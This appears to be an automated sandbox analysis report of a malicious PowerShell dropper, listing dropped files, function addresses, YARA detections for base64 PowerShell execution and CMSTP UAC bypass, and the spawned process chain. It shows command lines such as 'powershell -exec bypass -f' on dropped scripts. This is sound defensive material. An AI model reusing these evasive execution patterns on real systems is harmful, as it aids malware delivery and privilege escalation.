                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\msvcp100.dllJump to dropped file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\VWPGdipf\Data\ffmpeg.dllJump to dropped file
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB643A65_2_6BB643A6
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBAA3DD5_2_6BBAA3DD
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB6A2A75_2_6BB6A2A7
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB63A1C5_2_6BB63A1C
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB672705_2_6BB67270
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BBF7A5A5_2_6BBF7A5A
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB521F05_2_6BB521F0
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB809195_2_6BB80919
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB7911E5_2_6BB7911E
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB670935_2_6BB67093
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB697A05_2_6BB697A0
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB68F835_2_6BB68F83
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB6867F5_2_6BB6867F
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB63DD05_2_6BB63DD0
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB7457E5_2_6BB7457E
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB69D655_2_6BB69D65
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 5_2_6BB9ECCD5_2_6BB9ECCD
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 8_2_6BC3E8228_2_6BC3E822
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: 8_2_6BC3EE048_2_6BC3EE04
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: String function: 6BC4378B appears 121 times
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: String function: 6BB6B046 appears 37 times
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: String function: 6BC43753 appears 247 times
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeCode function: String function: 6BB60C80 appears 45 times
                    Source: Resource.ct.0.drStatic PE information: Number of sections : 14 > 10
                    Source: amsi64_1856.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: 13.2.msiexec.exe.513aacd.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.msiexec.exe.51e06cd.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.more.com.439da00.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.Set-up.exe.3a81877.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.more.com.5049a00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.Set-up.exe.3ae5877.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.msiexec.exe.519aa00.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.Set-up.exe.3ac7544.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 12.2.Set-up.exe.3ac6944.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Set-up.exe.3753544.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Set-up.exe.3752944.10.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.more.com.508eacd.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.Set-up.exe.3b2b544.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 6.2.more.com.508f6cd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.Set-up.exe.3b2a944.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 9.2.msiexec.exe.51dfacd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.more.com.43e2acd.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 10.2.more.com.43e36cd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.msiexec.exe.50f5a00.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.msiexec.exe.513b6cd.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 5.2.Set-up.exe.370d877.9.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: powershell.exe PID: 1856, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: UpdateClient.dll.0.dr, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                    Source: UpdateClient.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                    Source: UpdateClient.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                    Source: UpdateCommon.dll.0.dr, SimpleZip.csCryptographic APIs: 'CreateDecryptor'
                    Source: UpdateCommon.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                    Source: UpdateCommon.dll.0.dr, SimpleZip.csCryptographic APIs: 'TransformFinalBlock'
                    Source: UpdateCommon.dll.0.dr, InstalledModule.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winPS1@19/224@2/2
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\jcysbXpH.zipJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4268:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5020:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tltwzlfm.vxx.ps1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\IaslcsMo.ps1"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.com
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe"
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe "C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass -f "C:\Users\user\AppData\Local\Temp\S8RGGAQW7QVSMBVCVHPY4.ps1"Jump to behavior
                    Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exeJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: starburn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtcore4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtgui4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtnetwork4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtxml4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pla.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: tdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: ulib.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: fsutilext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\more.comSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: starburn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtcore4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtgui4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtnetwork4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: qtxml4.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcp100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: dbgcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pla.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: pdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: tdh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: cabinet.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: wevtapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\VWPGdipf\Set-up.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: shdocvw.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dllJump to behavior
